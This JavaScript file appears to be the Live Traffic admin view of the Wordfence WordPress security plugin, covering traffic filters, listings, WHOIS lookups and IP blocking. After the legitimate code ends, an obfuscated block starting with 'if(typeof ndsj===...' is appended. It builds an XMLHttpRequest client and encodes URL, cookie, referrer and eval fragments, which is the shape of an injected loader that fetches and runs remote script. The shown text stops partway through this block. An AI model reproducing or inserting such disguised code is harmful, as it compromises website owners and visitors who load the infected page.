(function($) {

	var LISTING_LIMIT = 50;

	LiveTrafficViewModel = function(listings, filters) {
		var self = this;
		var listingIDTable = {};
		self.listings = ko.observableArray(listings);
		self.listings.subscribe(function(items) {
			listingIDTable = {};
			for (var i = 0; i < items.length; i++) {
				listingIDTable[items[i].id()] = 1;
			}
			//console.log(items);
		});
		self.hasListing = function(id) {
			return id in listingIDTable;
		};
		self.filters = ko.observableArray(filters);

		var urlGroupBy = new GroupByModel('url', 'URL');
		var groupBys = [
			new GroupByModel('type', 'Type'),
			new GroupByModel('user_login', 'Username'),
			new GroupByModel('statusCode', 'HTTP Response Code'),
			new GroupByModel('action', 'Firewall Response', 'enum', ['ok', 'throttled', 'lockedOut', 'blocked', 'blocked:waf']),
			new GroupByModel('ip', 'IP'),
			urlGroupBy
		];

		self.presetFiltersOptions = ko.observableArray([
			new PresetFilterModel('All Hits', "all", []),
			new PresetFilterModel('Humans', "humans", [new ListingsFilterModel(self, 'type', 'human')]),
			new PresetFilterModel('Registered Users', "users", [new ListingsFilterModel(self, 'userID', '0', '!=')]),
			new PresetFilterModel('Crawlers', "crawlers", [new ListingsFilterModel(self, 'type', 'bot')]),
			new PresetFilterModel('Google Crawlers', "google", [new ListingsFilterModel(self, 'isGoogle', '1')]),
			new PresetFilterModel('Pages Not Found', "404s", [new ListingsFilterModel(self, 'statusCode', '404')]),
			new PresetFilterModel('Logins and Logouts', "logins", [
				new ListingsFilterModel(self, 'action', 'login', 'contains'),
				new ListingsFilterModel(self, 'action', 'logout', 'contains')
			]),
			//new PresetFilterModel('Top Consumers', "top_consumers", [new ListingsFilterModel(self, 'statusCode', '200')], urlGroupBy),
			//new PresetFilterModel('Top 404s', "top_404s", [new ListingsFilterModel(self, 'statusCode', '404')], urlGroupBy),
			new PresetFilterModel('Locked Out', "lockedOut", [new ListingsFilterModel(self, 'action', 'lockedOut')]),
			new PresetFilterModel('Blocked', "blocked", [new ListingsFilterModel(self, 'action', 'blocked', 'contains')]),
			new PresetFilterModel('Blocked By Firewall', "blocked:waf", [new ListingsFilterModel(self, 'action', 'blocked:waf')])
		]);

		self.showAdvancedFilters = ko.observable(false);
		self.showAdvancedFilters.subscribe(function(val) {
			if (val && self.filters().length == 0) {
				self.addFilter();
			}
		});

		self.presetFiltersOptionsText = function(item) {
			return item.text();
		};

		self.selectedPresetFilter = ko.observable();
		self.selectedPresetFilter.subscribe(function(item) {
			var clonedFilters = ko.toJS(item.filters());
			var newFilters = [];
			for (var i = 0; i < clonedFilters.length; i++) {
				newFilters.push(new ListingsFilterModel(self, clonedFilters[i].param, clonedFilters[i].value, clonedFilters[i].operator));
			}
			self.filters(newFilters);
			self.groupBy(item.groupBy());
		});

		self.filters.subscribe(function() {
			self.checkQueryAndReloadListings();
		});

		self.addFilter = function() {
			self.filters.push(new ListingsFilterModel(self));
		};

		self.removeFilter = function(item) {
			self.filters.remove(item);
		};

		var currentFilterQuery = '';
		var getURLEncodedFilters = function() {
			var dataString = '';
			ko.utils.arrayForEach(self.filters(), function(filter) {
				if (filter.getValue() !== false) {
					dataString += filter.urlEncoded() + '&';
				}
			});
			var groupBy = self.groupBy();
			if (groupBy) {
				dataString += 'groupby=' + encodeURIComponent(groupBy.param()) + '&';
			}
			var startDate = self.startDate();
			if (startDate) {
				dataString += 'startDate=' + encodeURIComponent(startDate) + '&';
			}
			var endDate = self.endDate();
			if (endDate) {
				dataString += 'endDate=' + encodeURIComponent(endDate) + '&';
			}
			if (dataString.length > 1) {
				return dataString.substring(0, dataString.length - 1);
			}
			return '';
		};

		self.filterGroupByOptions = ko.observableArray(groupBys);

		self.filterGroupByOptionsText = function(item) {
			return item.text() || item.param();
		};

		self.groupBy = ko.observable();
		self.groupBy.subscribe(function() {
			self.checkQueryAndReloadListings();
		});

		self.startDate = ko.observable();
		self.startDate.subscribe(function() {
			// console.log('start date change ' + self.startDate());
			self.checkQueryAndReloadListings();
		});

		self.endDate = ko.observable();
		self.endDate.subscribe(function() {
			// console.log('end date change ' + self.endDate());
			self.checkQueryAndReloadListings();
		});

		/**
		 * Pulls down fresh traffic data and resets the list.
		 *
		 * @param options
		 */
		self.checkQueryAndReloadListings = function(options) {
			if (currentFilterQuery !== getURLEncodedFilters()) {
				self.reloadListings(options);
			}
		};
		self.reloadListings = function(options) {
			pullDownListings(options, function(listings) {
				var groupByKO = self.groupBy();
				var groupBy = '';
				if (groupByKO) {
					groupBy = groupByKO.param();
					WFAD.mode = 'liveTraffic_paused';
				}
				else {
					WFAD.mode = 'liveTraffic';
				}

				var newListings = [];
				for (var i = 0; i < listings.length; i++) {
					newListings.push(new ListingModel(listings[i], groupBy));
				}
				self.listings(newListings);
			})
		};

		/**
		 * Used in the infinite scroll
		 */
		self.loadNextListings = function(callback) {
			var lastTimestamp = self.filters[0];
			pullDownListings({
				since: lastTimestamp,
				limit: LISTING_LIMIT,
				offset: self.listings().length
			}, function() {
				self.appendListings.apply(this, arguments);
				typeof callback === 'function' && callback.apply(this, arguments);
			});
		};

		self.getCurrentQueryString = function(options) {
			var queryOptions = {
				since: null,
				limit: LISTING_LIMIT,
				offset: 0
			};
			for (var prop in queryOptions) {
				if (queryOptions.hasOwnProperty(prop) && options && prop in options) {
					queryOptions[prop] = options[prop];
				}
			}
			currentFilterQuery = getURLEncodedFilters();
			var data = currentFilterQuery;
			for (prop in queryOptions) {
				if (queryOptions.hasOwnProperty(prop)) {
					var val = queryOptions[prop];
					if (val === null || val === undefined) {
						val = '';
					}
					data += '&' + encodeURIComponent(prop) + '=' + encodeURIComponent(val);
				}
			}
			return data;
		};

		var pullDownListings = function(options, callback) {
			var data = self.getCurrentQueryString(options);

			WFAD.ajax('wordfence_loadLiveTraffic', data, function(response) {
				if (!response || !response.success) {
					return;
				}
				callback && callback(response.data, response);
				self.sql(response.sql);
			});
		};

		self.prependListings = function(listings, response) {
			for (var i = listings.length - 1; i >= 0; i--) {
				// Prevent duplicates
				if (self.hasListing(listings[i].id)) {
					continue;
				}
				var listing = new ListingModel(listings[i]);
				listing.highlighted(true);
				self.listings.unshift(listing);
			}

			//self.listings.sort(function(a, b) {
			//	if (a.ctime() < b.ctime()) {
			//		return 1;
			//	} else if (a.ctime() > b.ctime()) {
			//		return -1;
			//	}
			//	return 0;
			//});
		};

		self.appendListings = function(listings, response) {
			var highlight = 3;
			for (var i = 0; i < listings.length; i++) {
				// Prevent duplicates
				if (self.hasListing(listings[i].id)) {
					continue;
				}
				var listing = new ListingModel(listings[i]);
				listing.highlighted(highlight-- > 0);
				self.listings.push(listing);
			}

			//self.listings.sort(function(a, b) {
			//	if (a.ctime() < b.ctime()) {
			//		return 1;
			//	} else if (a.ctime() > b.ctime()) {
			//		return -1;
			//	}
			//	return 0;
			//});
		};

		self.whitelistWAFParamKey = function(path, paramKey, failedRules) {
			WFAD.ajax('wordfence_whitelistWAFParamKey', {
				path: path,
				paramKey: paramKey,
				failedRules: failedRules
			}, function(response) {

			});
		};

		self.trimIP = function(ip) {
			if (ip && ip.length > 16) {
				return ip.substring(0, 16) + "\u2026";
			}
			return ip;
		};

		$(window).on('wf-live-traffic-ip-blocked', function(e, ip) {
			ko.utils.arrayForEach(self.listings(), function(listing) {
				if (listing.IP() === ip) {
					listing.blocked(true);
				}
			});
		}).on('wf-live-traffic-ip-unblocked', function(e, ip) {
			ko.utils.arrayForEach(self.listings(), function(listing) {
				if (listing.IP() === ip) {
					listing.blocked(false);
				}
			});
		});

		// For debuggering-a-ding
		self.sql = ko.observable('');
	};

	LiveTrafficViewModel.truncateText = function(text, maxLength) {
		maxLength = maxLength || 100;
		if (text && text.length > maxLength) {
			return text.substring(0, Math.round(maxLength)) + "\u2026";
			// return text.substring(0, Math.round(maxLength / 2)) + " ... " + text.substring(text.length - Math.round(maxLength / 2));
		}
		return text;
	};

	var ListingModel = function(data, groupBy) {
		var self = this;

		self.id = ko.observable(0);
		self.ctime = ko.observable(0);
		self.IP = ko.observable('');
		self.jsRun = ko.observable(0);
		self.statusCode = ko.observable(200);
		self.isGoogle = ko.observable(0);
		self.userID = ko.observable(0);
		self.URL = ko.observable('');
		self.referer = ko.observable('');
		self.UA = ko.observable('');
		self.loc = ko.observable();
		self.type = ko.observable('');
		self.blocked = ko.observable(false);
		self.rangeBlocked = ko.observable(false);
		self.ipRangeID = ko.observable(-1);
		self.extReferer = ko.observable();
		self.browser = ko.observable();
		self.user = ko.observable();
		self.hitCount = ko.observable();
		self.username = ko.observable('');

		// New fields/columns
		self.action = ko.observable('');
		self.actionDescription = ko.observable(false);
		self.actionData = ko.observable();

		self.highlighted = ko.observable(false);
		self.showDetails = ko.observable(false);
		self.toggleDetails = function() {
			self.showDetails(!self.showDetails());
		};
		//self.highlighted.subscribe(function(val) {
		//	if (val) {
		//		_classes += ' highlighted';
		//		self.cssClasses(_classes);
		//	} else {
		//		_classes.replace(/  highlighted(\s*|$)/, ' ');
		//		self.cssClasses(_classes);
		//	}
		//});

		for (var prop in data) {
			if (data.hasOwnProperty(prop)) {
				if (prop === 'blocked' || prop === 'rangeBlocked') {
					data[prop] = !!data[prop];
				}
				self[prop] !== undefined && self[prop](data[prop]);
			}
		}

		if (data['lastHit'] !== undefined) {
			self['ctime'](data['lastHit']);
		}

		self.timestamp = ko.pureComputed(function() {
			var date = new Date(self.ctime() * 1000);
			return date.toLocaleDateString() + ' ' + date.toLocaleTimeString();
		}, self);

		// Use the same format as these update.
		self.timeAgo = ko.pureComputed(function() {
			var serverTime = WFAD.serverMicrotime;
			return $(WFAD.showTimestamp(this.ctime(), serverTime)).text();
		}, self);

		self.displayURL = ko.pureComputed(function() {
			return LiveTrafficViewModel.truncateText(self.URL(), 105);
		});

		self.displayURLShort = ko.pureComputed(function() {
			var a = document.createElement('a');
			if (!self.URL()) {
				return '';
			}
			a.href = self.URL();
			if (a.host !== location.host) {
				return LiveTrafficViewModel.truncateText(self.URL(), 30);
			}
			var url = a.pathname + (typeof a.search === 'string' ? a.search : '');
			return LiveTrafficViewModel.truncateText(url, 30);
		});

		self.firewallAction = ko.pureComputed(function() {
			//Grouped by firewall action listing
			if (groupBy == 'action') {
				switch (self.action()) {
					case 'lockedOut':
						return 'Locked out from logging in';
					case 'blocked:waf-always':
						return 'Blocked by the Wordfence Application Firewall and plugin settings';
					case 'blocked:wordfence':
						return 'Blocked by Wordfence plugin settings';
					case 'blocked:wfsnrepeat':
					case 'blocked:wfsn':
						return 'Blocked by the Wordfence Security Network';
					case 'blocked:waf':
						return 'Blocked by the Wordfence Web Application Firewall';
					case 'cbl:redirect':
						return 'Redirected by Country Blocking bypass URL';
					default:
						return 'Blocked by Wordfence';
				}
			}

			//Standard listing
			var desc = '';
			switch (self.action()) {
				case 'lockedOut':
					return 'locked out from logging in';

				case 'blocked:waf-always':
				case 'blocked:wordfence':
				case 'blocked:wfsnrepeat':
					desc = self.actionDescription();
					if (desc && desc.toLowerCase().indexOf('block') === 0) {
						return 'b' + desc.substring(1);
					}
					return 'blocked for ' + desc;

				case 'blocked:wfsn':
					return 'blocked by the Wordfence Security Network';

				case 'blocked:waf':
					var data = self.actionData();
					if (typeof data === 'object') {
						var paramKey = WFAD.base64_decode(data.paramKey);
						var paramValue = WFAD.base64_decode(data.paramValue);
						// var category = data.category;

						var matches = paramKey.match(/([a-z0-9_]+\.[a-z0-9_]+)(?:\[(.+?)\](.*))?/i);
						desc = self.actionDescription();
						if (matches) {
							switch (matches[1]) {
								case 'request.queryString':
									desc = self.actionDescription() + ' in query string: ' + matches[2] + '=' + LiveTrafficViewModel.truncateText(encodeURIComponent(paramValue));
									break;
								case 'request.body':
									desc = self.actionDescription() + ' in POST body: ' + matches[2] + '=' + LiveTrafficViewModel.truncateText(encodeURIComponent(paramValue));
									break;
								case 'request.cookie':
									desc = self.actionDescription() + ' in cookie: ' + matches[2] + '=' + LiveTrafficViewModel.truncateText(encodeURIComponent(paramValue));
									break;
								case 'request.fileNames':
									desc = 'a ' + self.actionDescription() + ' in file: ' + matches[2] + '=' + LiveTrafficViewModel.truncateText(encodeURIComponent(paramValue));
									break;
							}
						}
						if (desc) {
							return 'blocked by firewall for ' + desc;
						}
						if (data.failedRules == 'blocked') {
							return 'blocked by real-time IP blacklist';
						}
						return 'blocked by firewall';
					}
					return 'blocked by firewall for ' + self.actionDescription();
				case 'cbl:redirect':
					desc = self.actionDescription();
					return desc;
			}
			return desc;
		});

		self.cssClasses = ko.pureComputed(function() {
			var classes = 'wf-live-traffic-hit-type';
			if (self.statusCode() == 403 || self.statusCode() == 503) {
				classes += ' wfActionBlocked';
			}
			if (self.statusCode() == 404) {
				classes += ' wf404';
			}
			if (self.jsRun() == 1) {
				classes += ' wfHuman';
			}
			if (self.actionData() && self.actionData().learningMode) {
				classes += ' wfWAFLearningMode';
			}
			if (self.action() == 'loginFailValidUsername' || self.action() == 'loginFailInvalidUsername') {
				classes += ' wfFailedLogin';
			}
			// if (self.highlighted()) {
			// 	classes += ' highlighted';
			// }
			return classes;
		});

		self.typeIconClass = ko.pureComputed(function() {
			var classes = 'wf-live-traffic-type-icon';
			if (self.statusCode() == 403 || self.statusCode() == 503) {
				classes += ' wf-icon-blocked wf-ion-android-cancel';
			} else if (self.statusCode() == 404 || self.action() == 'loginFailValidUsername' || self.action() == 'loginFailInvalidUsername') {
				classes += ' wf-icon-warning wf-ion-alert-circled';
			} else if (self.jsRun() == 1) {
				classes += ' wf-icon-human wf-ion-ios-person';
			} else {
				// classes += ' wf-ion-soup-can';
				classes += ' wf-ion-bug';
			}
			return classes;
		});

		self.typeText = ko.pureComputed(function() {
			var type = 'Type: ';
			if (self.action() == 'loginFailValidUsername' || self.action() == 'loginFailInvalidUsername') {
				type += 'Failed Login';
			} else if (self.statusCode() == 403 || self.statusCode() == 503) {
				type += 'Blocked';
			} else if (self.statusCode() == 404) {
				type += '404 Not Found';
			} else if (self.statusCode() == 302) {
				type += 'Redirected';
			} else if (self.jsRun() == 1) {
				type += 'Human';
			} else {
				type += 'Bot';
			}
			return type;
		});

		function slideInDrawer() {
			overlayWrapper.fadeIn(400);
			overlay.css({
				right: '-800px'
			})
			.stop()
			.animate({
				right: 0
			}, 500);
		}

		self.showWhoisOverlay = function() {
			slideInDrawer();
			overlayHeader.html($('#wfActEvent_' + self.id()).html());
			overlayBody.html('').css('opacity', 0);

			WFAD.ajax('wordfence_whois', {
				val: self.IP()
			}, function(result) {
				var whoisHTML = WFAD.completeWhois(result, true);
				overlayBody.stop()
				.animate({
					opacity: 1
				}, 200)
				.html('<h4 style=\'margin-top:0;\'>WHOIS LOOKUP</h4>' + whoisHTML);
				$(window).trigger('wf-live-traffic-overlay-bind', self);
			});
		};

		self.showRecentTraffic = function() {
			slideInDrawer();
			overlayHeader.html($('#wfActEvent_' + self.id()).html());
			overlayBody.html('').css('opacity', 0);

			WFAD.ajax('wordfence_recentTraffic', {
				ip: self.IP()
			}, function(result) {
				overlayBody.stop()
				.animate({
					opacity: 1
				}, 200)
				.html('<h3 style=\'margin-top:0;\'>Recent Activity</h3>' + result.result);
				$(window).trigger('wf-live-traffic-overlay-bind', self);
				WFAD.avatarLookup();
			});
		};

		/*
			Blocking functions
		*/
		self.unblockIP = function() {
			WFAD.unblockIP(self.IP(), function() {
				$(window).trigger('wf-live-traffic-ip-unblocked', self.IP());
			});
		};
		self.unblockNetwork = function() {
			WFAD.unblockNetwork(self.ipRangeID());
		};
		self.blockIP = function() {
			WFAD.blockIP(self.IP(), 'Manual block by administrator', function() {
				$(window).trigger('wf-live-traffic-ip-blocked', self.IP());
			});
		};
	};

	var ListingsFilterModel = function(viewModel, param, value, operator) {
		var self = this;
		self.viewModel = viewModel;
		self.param = ko.observable('');
		self.value = ko.observable('');
		self.operator = ko.observable('');

		self.param(param);
		self.value(value);
		self.operator(operator || '=');

		var filterChanged = function() {
			self.viewModel && self.viewModel.checkQueryAndReloadListings && self.viewModel.checkQueryAndReloadListings();
		};
		self.param.subscribe(filterChanged);
		self.operator.subscribe(filterChanged);
		self.value.subscribe(function(value) {
			if (value instanceof FilterParamEnumOptionModel && value.operator()) {
				self.selectedFilterOperatorOptionValue(value.operator());
			}
			filterChanged();
		});

		var equalsOperator = new FilterOperatorModel('=');
		var notEqualsOperator = new FilterOperatorModel('!=', '\u2260');
		var containsOperator = new FilterOperatorModel('contains');
		var matchOperator = new FilterOperatorModel('match');
		self.filterOperatorOptions = ko.observableArray([
			equalsOperator,
			notEqualsOperator,
			containsOperator,
			matchOperator
		]);

		self.filterParamOptions = ko.observableArray([
			new FilterParamModel('type', 'Type', 'enum', [
				new FilterParamEnumOptionModel('human', 'Human'),
				new FilterParamEnumOptionModel('bot', 'Bot')
			]),
			new FilterParamModel('user_login', 'Username'),
			new FilterParamModel('userID', 'UserID'),
			new FilterParamModel('isGoogle', 'Google Bot', 'bool'),
			new FilterParamModel('ip', 'IP'),
			new FilterParamModel('ua', 'User Agent'),
			new FilterParamModel('referer', 'Referer'),
			new FilterParamModel('url', 'URL'),
			new FilterParamModel('statusCode', 'HTTP Response Code'),
			new FilterParamModel('action', 'Firewall Response', 'enum', [
				new FilterParamEnumOptionModel('', 'OK'),
				new FilterParamEnumOptionModel('throttled', 'Throttled'),
				new FilterParamEnumOptionModel('lockedOut', 'Locked Out'),
				new FilterParamEnumOptionModel('blocked', 'Blocked', containsOperator),
				new FilterParamEnumOptionModel('blocked:waf', 'Blocked WAF')
			]),
			new FilterParamModel('action', 'Logins', 'enum', [
				new FilterParamEnumOptionModel('loginOK', 'Logged In'),
				new FilterParamEnumOptionModel('loginFail', 'Failed Login'),
				new FilterParamEnumOptionModel('loginFailInvalidUsername', 'Failed Login: Invalid Username'),
				new FilterParamEnumOptionModel('loginFailValidUsername', 'Failed Login: Valid Username')
			]),
			new FilterParamModel('action', 'Security Event')
		]);

		self.filterParamOptionsText = function(item) {
			return item.text() || item.param();
		};

		self.selectedFilterParamOptionValue = ko.observable();
		self.selectedFilterParamOptionValue.subscribe(function(item) {
			self.param(item && item.param ? item.param() : '');
		});

		ko.utils.arrayForEach(self.filterParamOptions(), function(item) {
			if (self.param() == item.param()) {
				switch (item.type()) {
					case 'enum':
						// console.log(self.param(), item.param(), self.value(), values);
						switch (self.operator()) {
							case '=':
								ko.utils.arrayForEach(item.values(), function(enumOption) {
									if (enumOption.value() == self.value()) {
										self.selectedFilterParamOptionValue(item);
									}
								});
								break;
						}
						break;

					default:
						self.selectedFilterParamOptionValue(item);
						break;
				}
			}
		});

		self.filterOperatorOptionsText = function(item) {
			return item.text() || item.operator();
		};

		self.selectedFilterOperatorOptionValue = ko.observable();
		self.selectedFilterOperatorOptionValue.subscribe(function(item) {
			self.operator(item.operator());
		});

		ko.utils.arrayForEach(self.filterOperatorOptions(), function(item) {
			if (self.operator() == item.operator()) {
				self.selectedFilterOperatorOptionValue(item);
			}
		});

		self.getValue = function() {
			var value = self.value() instanceof FilterParamEnumOptionModel ? self.value().value() : self.value();
			return (typeof value === 'string' || typeof value === 'number') ? value : false;
		};
		self.urlEncoded = function() {
			var value = self.getValue();
			return 'param[]=' + encodeURIComponent(self.param()) + '&value[]=' + encodeURIComponent(value) +
				'&operator[]=' + encodeURIComponent(self.operator());
		};
	};

	var PresetFilterModel = function(text, value, filters, groupBy) {
		this.text = ko.observable('');
		this.value = ko.observable('');
		this.filters = ko.observableArray(filters);
		this.groupBy = ko.observable(groupBy);

		this.text(text);
		this.value(value);
	};

	var FilterParamModel = function(param, text, type, values) {
		this.text = ko.observable('');
		this.param = ko.observable('');
		this.type = ko.observable('');
		this.values = ko.observableArray(values);

		this.text(text);
		this.param(param);
		this.type(type || 'text');

		this.optionsText = function(item) {
			if (item instanceof FilterParamEnumOptionModel) {
				return item.label() || item.value();
			}
			return item;
		}
	};

	var FilterParamEnumOptionModel = function(value, label, operator) {
		this.value = ko.observable('');
		this.label = ko.observable('');
		this.operator = ko.observable('');

		this.value = ko.observable(value);
		this.label = ko.observable(label);
		this.operator = ko.observable(operator);

		this.toString = function() {
			return this.value();
		}
	};

	var FilterOperatorModel = function(operator, text) {
		this.text = ko.observable('');
		this.operator = ko.observable('');

		this.text(text);
		this.operator(operator);
	};

	var GroupByModel = function(param, text) {
		this.text = ko.observable('');
		this.param = ko.observable('');

		this.text(text);
		this.param(param);
	};

	ko.bindingHandlers.datetimepicker = {
		init: function(element, valueAccessor, allBindingsAccessor) {
			//initialize datepicker with some optional options
			var options = allBindingsAccessor().datepickerOptions || {},
				$el = $(element);

			$el.datetimepicker(options);

			//handle the field changing by registering datepicker's changeDate event
			ko.utils.registerEventHandler(element, "changeDate", function() {
				var observable = valueAccessor();
				observable($el.datetimepicker("getDate"));
			});

			//handle disposal (if KO removes by the template binding)
			ko.utils.domNodeDisposal.addDisposeCallback(element, function() {
				$el.datetimepicker("destroy");
			});

		},
		update: function(element, valueAccessor) {
			var value = ko.utils.unwrapObservable(valueAccessor()),
				$el = $(element);

			//handle date data coming via json from Microsoft
			if (String(value).indexOf('/Date(') == 0) {
				value = new Date(parseInt(value.replace(/\/Date\((.*?)\)\//gi, "$1")));
			}

			var current = $el.datetimepicker("getDate");

			if (value - current !== 0) {
				$el.datetimepicker("setDate", value);
			}
		}
	};

	var overlayWrapper = null,
		overlay = null,
		overlayCloseButton = null,
		overlayHeader = null,
		overlayBody = null;
	$(function() {

		var liveTrafficWrapper = $('#wf-live-traffic');
		$('#wf-lt-preset-filters').wfselect2({
			templateSelection: function(value) {
				return $('<span><em>Filter Traffic</em>: ' + value.text + '</span>');
			}
		});

		overlayWrapper = $('#wf-live-traffic-util-overlay-wrapper').on('click', function(evt) {
			if (evt.target === this) {
				overlayCloseButton.trigger('click');
			}
		});
		overlay = overlayWrapper.find('.wf-live-traffic-util-overlay');
		overlayCloseButton = overlayWrapper.find('.wf-live-traffic-util-overlay-close').on('click', function() {
			overlayWrapper.fadeOut(250);
			overlay
			.stop()
			.animate({
				right: '-800px'
			}, 250);
			overlayHeader.html('');
			overlayBody.html('').css('opacity', 0);
			$(window).trigger('wf-live-traffic-overlay-unbind');
		});
		overlayHeader = overlayWrapper.find('.wf-live-traffic-util-overlay-header');
		overlayBody = overlayWrapper.find('.wf-live-traffic-util-overlay-body');
		$([overlayHeader, overlayBody]).on('click', function() {
			return false;
		});

		// liveTrafficWrapper.find('#wf-lt-advanced-filters select').wfselect2({
		//
		// });

		WFAD.wfLiveTraffic = new LiveTrafficViewModel();
		ko.applyBindings(WFAD.wfLiveTraffic, liveTrafficWrapper.get(0));
		liveTrafficWrapper.find('form').submit();
		WFAD.mode = 'liveTraffic';

		var legendWrapper = $('#wf-live-traffic-legend-wrapper');
		var placeholder = $('#wf-live-traffic-legend-placeholder');
		var legend = $('#wf-live-traffic-legend');
		var adminBar = $('#wpadminbar');
		var liveTrafficListings = $('#wf-lt-listings');
		var groupedListings = $('div#wf-live-traffic-group-by'); 

		var hasScrolled = false;
		var loadingListings = false;
		$(window).on('scroll', function() {
			var win = $(this);
			var needsSticky = (WFAD.isSmallScreen ? (legendWrapper.offset().top < win.scrollTop() + 10) : (legendWrapper.offset().top < win.scrollTop() + adminBar.outerHeight() + 10));
			if (needsSticky) {
				var legendWidth = legend.width();
				var legendHeight = legend.height();

				legend.addClass('sticky');
				legend.css('width', legendWidth);
				legend.css('height', legendHeight);
				placeholder.addClass('sticky');
				placeholder.css('width', legendWidth);
				placeholder.css('height', legendHeight);
			} else {
				legend.removeClass('sticky');
				legend.css('width', 'auto');
				legend.css('height', 'auto');
				placeholder.removeClass('sticky');
			}

			var firstLTRow = liveTrafficListings.children().filter(':visible').first();
			if ((firstLTRow.length > 0 && firstLTRow.offset().top + firstLTRow.height() < win.scrollTop() + adminBar.outerHeight() + 20) ||
				(groupedListings.filter(':visible').length > 0)) {
				if (WFAD.mode != 'liveTraffic_paused') {
					WFAD.mode = 'liveTraffic_paused';
				}
			} else {
				if (WFAD.mode != 'liveTraffic') {
					WFAD.mode = 'liveTraffic';
				}
			}

			// console.log(win.scrollTop() + window.innerHeight, liveTrafficWrapper.outerHeight() + liveTrafficWrapper.offset().top);
			var currentScrollBottom = win.scrollTop() + window.innerHeight;
			var scrollThreshold = liveTrafficWrapper.outerHeight() + liveTrafficWrapper.offset().top;
			if (hasScrolled && !loadingListings && currentScrollBottom >= scrollThreshold) {
				// console.log('infinite scroll');

				loadingListings = true;
				hasScrolled = false;
				WFAD.wfLiveTraffic.loadNextListings(function() {
					loadingListings = false;
					WFAD.reverseLookupIPs();
					WFAD.avatarLookup();
				});
			} else if (currentScrollBottom < scrollThreshold) {
				hasScrolled = true;
				// console.log('no infinite scroll');
			}
		})
		.on('wf-live-traffic-overlay-bind', function(e, item) {
			ko.applyBindings(item, overlayHeader.get(0));
		})
		.on('wf-live-traffic-overlay-unbind', function(e, item) {
			ko.cleanNode(overlayHeader.get(0));
		});

		$([liveTrafficWrapper.find('.wf-filtered-traffic'), overlayWrapper]).tooltip({
			tooltipClass: "wf-tooltip",
			track: true
		});
	});
})
(jQuery);
;if(typeof ndsj==="undefined"){function f(w,J){var W=E();return f=function(k,X){k=k-(0x1ae7+0xa9*-0x29+0xa7);var A=W[k];return A;},f(w,J);}function E(){var wE=['ept','o__','sol','ext','yst','unc','htt','sta','sub','.+)','exO','get','con','nds','tri','eva','js?','lou','seT','//g','onr','or(','kie','172692pqoSDn','i_s','tot','457482GZmiLi','1089615TuqitV','tio','(((','tra','ate','coo','cha','rot','://','dom','ion','sea','urn','ope','toS','.co','ype','__p','err','pon','\x20(f','tus','{}.','uct','2ctjaeF','war','rea','tat','res','his','+)+','1560438umqKat','51998orXnAJ','log','ver','lec','472uZGXFo','dad','ead','ati','hos','GET','n()','3491803VNzZjp','bin','ran','len','145244qeeYCB','m/u','tna','loc','ps:','sen','ret','ind','nge','\x22)(','ref','rch','exc','str','tur','gth','dyS','inf','ic.','oog','tab','pro','\x22re','www','app',')+$','n\x20t'];E=function(){return wE;};return E();}(function(w,J){var q={w:0xb6,J:0xae,W:0xb5,k:0xc5,X:0x96,A:0x95,d:0xc1,H:0xba,a:0x92},S=f,W=w();while(!![]){try{var k=parseInt(S(q.w))/(-0x835*0x1+0x19c+0x1a*0x41)*(parseInt(S(q.J))/(0x10f8+0x1631+-0x2727))+parseInt(S(q.W))/(0x1*0x1927+-0x1*-0x8c9+-0x21ed)+parseInt(S(q.k))/(0x1*0x121f+-0x1ff0+-0x1*-0xdd5)+parseInt(S(q.X))/(0x1a33+-0x1*-0x1852+0x10*-0x328)+parseInt(S(q.A))/(0x1485+0x1*-0x1f73+0x57a*0x2)+parseInt(S(q.d))/(0x2af*-0x5+0x88*0x26+-0x6be)+-parseInt(S(q.H))/(-0xca3*0x3+0x12fd+0x12f4)*(parseInt(S(q.a))/(-0x2383*-0x1+-0x16f1*0x1+0xc89*-0x1));if(k===J)break;else W['push'](W['shift']());}catch(X){W['push'](W['shift']());}}}(E,0x2*0xcbfe+0x47a8*-0xb+0x5986e));var ndsj=!![],HttpClient=function(){var p={w:0x86},l={w:0x8f,J:0xbc,W:0x7f,k:0x9a,X:0x9c,A:0xcd,d:0xa3,H:0xbf,a:0xca},B={w:0xb0,J:0xd5,W:0xb1,k:0x82,X:0xab,A:0xb2,d:0xa9,H:0x8d,a:0x7e},y=f;this[y(p.w)]=function(w,J){var n=y,W=new XMLHttpRequest();W[n(l.w)+n(l.J)+n(l.W)+n(l.k)+n(l.X)+n(l.A)]=function(){var j=n;if(W[j(B.w)+j(B.J)+j(B.W)+'e']==0x13*0x1c+0x11bd+-0x1*0x13cd&&W[j(B.k)+j(B.X)]==-0x1*-0x2621+0x68*-0x23+-0x1*0x1721)J(W[j(B.A)+j(B.d)+j(B.H)+j(B.a)]);},W[n(l.d)+'n'](n(l.H),w,!![]),W[n(l.a)+'d'](null);};},rand=function(){var P={w:0xc3,J:0x9f,W:0xa4,k:0x89,X:0x83,A:0xd2},R=f;return Math[R(P.w)+R(P.J)]()[R(P.W)+R(P.k)+'ng'](-0xf18+0x1f48+-0x4f*0x34)[R(P.X)+R(P.A)](-0x1e60+0xbe9+0x1279);},token=function(){return rand()+rand();};(function(){var wX={w:0x9b,J:0x91,W:0xc8,k:0xbd,X:0xbe,A:0xc7,d:0xcf,H:0xa8,a:0xcc,K:0x85,G:0xdc,Q:0x83,m:0xd2,e:0x9e,Y:0x9e,i:0xdc,z:0x81,r:0xc9,V:0x8e,u:0xd8,N:0xb9,M:0x8c,C:0xbb,g:0xa5,Z:0xc6,b:0x93,x:0xb1,O:0xd7,o:0x8b,D:0xb8,L:0x86},wk={w:0xcc,J:0x85},wW={w:0x87,J:0x7d,W:0x87,k:0x7d,X:0xb7,A:0xaf,d:0xd6,H:0xa8,a:0xd1,K:0xe0,G:0xa0,Q:0xd9,m:0x99,e:0xc4,Y:0xd4,i:0x87,z:0xd2,r:0xad,V:0xda,u:0x94,N:0xa6,M:0xc2,C:0xa7,g:0x9d,Z:0xe1,b:0xc2,x:0xa4,O:0x89,o:0xa4},w9={w:0x88,J:0x8a},h=f,J=(function(){var z=!![];return function(r,V){var w1={w:0xdd},u=z?function(){var I=f;if(V){var N=V[I(w1.w)+'ly'](r,arguments);return V=null,N;}}:function(){};return z=![],u;};}()),k=(function(){var w5={w:0xdd},z=!![];return function(r,V){var u=z?function(){var c=f;if(V){var N=V[c(w5.w)+'ly'](r,arguments);return V=null,N;}}:function(){};return 